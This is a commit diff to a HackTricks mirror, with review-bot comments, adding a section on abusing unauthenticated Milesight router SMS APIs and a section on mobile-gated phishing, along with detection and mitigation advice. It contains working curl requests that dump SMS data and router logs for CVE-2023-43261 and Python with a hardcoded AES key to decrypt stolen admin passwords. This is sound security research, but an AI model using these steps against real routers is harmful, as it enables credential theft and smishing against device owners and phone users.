mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Add content from: Silent Smishing: The Hidden Abuse of Cellular Router APIs
This commit is contained in:
parent
cd60902021
commit
c8a99a2b35
@ -247,6 +247,73 @@ Mitigations:
|
||||
- Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage.
|
||||
|
||||
---
|
||||
|
||||
## 10. Industrial Cellular Routers – Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261)
|
||||
|
||||
Abusing exposed web APIs of industrial cellular routers enables stealthy, carrier-origin smishing at scale. Milesight UR-series routers expose a JSON-RPC–style endpoint at `/cgi`. When misconfigured, the API can be queried without authentication to list SMS inbox/outbox and, in some deployments, to send SMS.
|
||||
|
||||
Typical unauthenticated requests (same structure for inbox/outbox):
|
||||
|
||||
```http
|
||||
POST /cgi HTTP/1.1
|
||||
Host: <router>
|
||||
Content-Type: application/json
|
||||
|
||||
{ "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] }
|
||||
```
|
||||
|
||||
```json
|
||||
{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] }
|
||||
```
|
||||
|
||||
Responses include fields such as `timestamp`, `content`, `phone_number` (E.164), and `status` (`success` or `failed`). Repeated `failed` sends to the same number are often attacker “capability checks” to validate that a router/SIM can deliver before blasting.
|
||||
|
||||
Example curl to exfiltrate SMS metadata:
|
||||
|
||||
```bash
|
||||
curl -sk -X POST http://<router>/cgi \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'
|
||||
```
|
||||
|
||||
Notes on auth artifacts:
|
||||
- Some traffic may include an auth cookie, but a large fraction of exposed devices respond without any authentication to `query_inbox`/`query_outbox` when the management interface is Internet-facing.
|
||||
- In environments requiring auth, previously-leaked credentials (see below) restore access.
|
||||
|
||||
Credential recovery path – CVE-2023-43261:
|
||||
- Affected families: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7).
|
||||
- Issue: web-served logs (e.g., `httpd.log`) are reachable unauthenticated under `/lang/log/` and contain admin login events with the password encrypted using a hardcoded AES key/IV present in client-side JavaScript.
|
||||
- Practical access and decrypt:
|
||||
|
||||
```bash
|
||||
curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p'
|
||||
# Look for entries like: {"username":"admin","password":"<base64>"}
|
||||
```
|
||||
|
||||
Minimal Python to decrypt leaked passwords (AES-128-CBC, hardcoded key/IV):
|
||||
|
||||
```python
|
||||
import base64
|
||||
from Crypto.Cipher import AES
|
||||
from Crypto.Util.Padding import unpad
|
||||
KEY=b'1111111111111111'; IV=b'2222222222222222'
|
||||
enc_b64='...' # value from httpd.log
|
||||
print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode())
|
||||
```
|
||||
|
||||
Hunting and detection ideas (network):
|
||||
- Alert on unauthenticated `POST /cgi` whose JSON body contains `base`/`function` set to `query_inbox` or `query_outbox`.
|
||||
- Track repeated `POST /cgi` bursts followed by `status":"failed"` entries across many unique numbers from the same source IP (capability testing).
|
||||
- Inventory Internet-exposed Milesight routers; restrict management to VPN; disable SMS features unless required; upgrade to ≥ v35.3.0.7; rotate credentials and review SMS logs for unknown sends.
|
||||
|
||||
Shodan/OSINT pivots (examples seen in the wild):
|
||||
- `http.html:"rt_title"` matches Milesight router panels.
|
||||
- Google dorking for exposed logs: `"/lang/log/system" ext:log`.
|
||||
|
||||
Operational impact: using legitimate carrier SIMs inside routers gives very high SMS deliverability/credibility for phishing, while inbox/outbox exposure leaks sensitive metadata at scale.
|
||||
|
||||
---
|
||||
|
||||
## Detection Ideas
|
||||
1. **Any device other than an SGSN/GGSN establishing Create PDP Context Requests**.
|
||||
2. **Non-standard ports (53, 80, 443) receiving SSH handshakes** from internal IPs.
|
||||
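Review bot: the Python block under "Minimal Python to decrypt leaked passwords" imports `Crypto.Cipher` and `Crypto.Util.Padding` without naming the package that provides them; say it needs PyCryptodome (`pip install pycryptodome`), because the abandoned `pycrypto` package uses the same import path and fails on current Python versions, which is the first thing a reader running this will hit. Two smaller points in the same hunk: `curl -sk` is paired with `http://` URLs, where `-k` does nothing (keep it only where the management interface is actually served over HTTPS), and the detection list alerts only on `query_inbox`/`query_outbox` even though the opening paragraph says the same API can send SMS in some deployments; either name the send function if the source identifies it, or phrase the first bullet as "any `POST /cgi` carrying `base`/`function` without a session cookie", so defenders are not watching only the read-only calls.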
@ -263,5 +330,8 @@ Mitigations:
|
||||
- [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol)
|
||||
- 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS
|
||||
- 3GPP TS 33.501 – Security architecture and procedures for 5G System
|
||||
- [Silent Smishing: The Hidden Abuse of Cellular Router APIs (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/)
|
||||
- [CVE-2023-43261 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-43261)
|
||||
- [CVE-2023-43261 PoC (win3zz)](https://github.com/win3zz/CVE-2023-43261)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
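Review bot: the line `{{#include ../../banners/hacktricks-training.md}}` appears twice at the end of this hunk, while HackTricks pages close with a single banner include; the header `+330,8` accounts for exactly three added lines (the Sekoia, NVD and PoC references), so check whether the second copy is a stray duplicate introduced while appending the references and drop it if so.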
@ -579,6 +579,37 @@ clipboard-hijacking.md
|
||||
mobile-phishing-malicious-apps.md
|
||||
{{#endref}}
|
||||
|
||||
### Mobile‑gated phishing to evade crawlers/sandboxes
|
||||
Operators increasingly gate their phishing flows behind a simple device check so desktop crawlers never reach the final pages. A common pattern is a small script that tests for a touch-capable DOM and posts the result to a server endpoint; non‑mobile clients receive HTTP 500 (or a blank page), while mobile users are served the full flow.
|
||||
|
||||
Minimal client snippet (typical logic):
|
||||
|
||||
```html
|
||||
<script src="/static/detect_device.js"></script>
|
||||
```
|
||||
|
||||
`detect_device.js` logic (simplified):
|
||||
|
||||
```javascript
|
||||
const isMobile = ('ontouchstart' in document.documentElement);
|
||||
fetch('/detect', {method:'POST', headers:{'Content-Type':'application/json'}, body: JSON.stringify({is_mobile:isMobile})})
|
||||
.then(()=>location.reload());
|
||||
```
|
||||
|
||||
Server behaviour often observed:
|
||||
- Sets a session cookie during the first load.
|
||||
- Accepts `POST /detect {"is_mobile":true|false}`.
|
||||
- Returns 500 (or placeholder) to subsequent GETs when `is_mobile=false`; serves phishing only if `true`.
|
||||
|
||||
Hunting and detection heuristics:
|
||||
- urlscan query: `filename:"detect_device.js" AND page.status:500`
|
||||
- Web telemetry: sequence of `GET /static/detect_device.js` → `POST /detect` → HTTP 500 for non‑mobile; legitimate mobile victim paths return 200 with follow‑on HTML/JS.
|
||||
- Block or scrutinize pages that condition content exclusively on `ontouchstart` or similar device checks.
|
||||
|
||||
Defence tips:
|
||||
- Execute crawlers with mobile‑like fingerprints and JS enabled to reveal gated content.
|
||||
- Alert on suspicious 500 responses following `POST /detect` on newly registered domains.
|
||||
|
||||
## References
|
||||
|
||||
- [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)
|
||||
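Review bot: the defence tip "Execute crawlers with mobile-like fingerprints" should state that the gate in `detect_device.js` keys on `'ontouchstart' in document.documentElement`, not on the User-Agent, so a crawler needs touch-event emulation (for example a Playwright browser context opened with `hasTouch: true`) rather than just a mobile UA string, otherwise it still receives the 500 and never sees the gated content. Minor: the snippet calls `location.reload()` unconditionally after `POST /detect`, so the telemetry sequence in the hunting bullet is really `GET /page` → `GET /static/detect_device.js` → `POST /detect` → second `GET /page` (500 for non-mobile, 200 for mobile); naming that second page load makes the proxy-log signature easier to match.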
@ -586,6 +617,7 @@ mobile-phishing-malicious-apps.md
|
||||
- [https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/](https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/)
|
||||
- [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
|
||||
- [2025 Unit 42 Global Incident Response Report – Social Engineering Edition](https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-report-social-engineering-edition/)
|
||||
- [Silent Smishing – mobile-gated phishing infra and heuristics (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
|
||||
|
||||
> [!TIP]
|
||||
>
|
||||
> - **How can I cite a page of HackTricks?**
|
||||
> - **How can I a page of HackTricks?**
|
||||
|
||||
As long as the link **of** the page(s) where you took the information from appears it's enough.\
|
||||
If you need a bibtex you can use something like:
|
||||
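Review bot: the replaced line drops the verb, turning `> - **How can I cite a page of HackTricks?**` into `> - **How can I a page of HackTricks?**`, which is ungrammatical and no longer matches the answer that follows ("As long as the link of the page(s) ... appears it's enough"); this looks like an accidental deletion while editing, so the original wording should be restored.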
@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|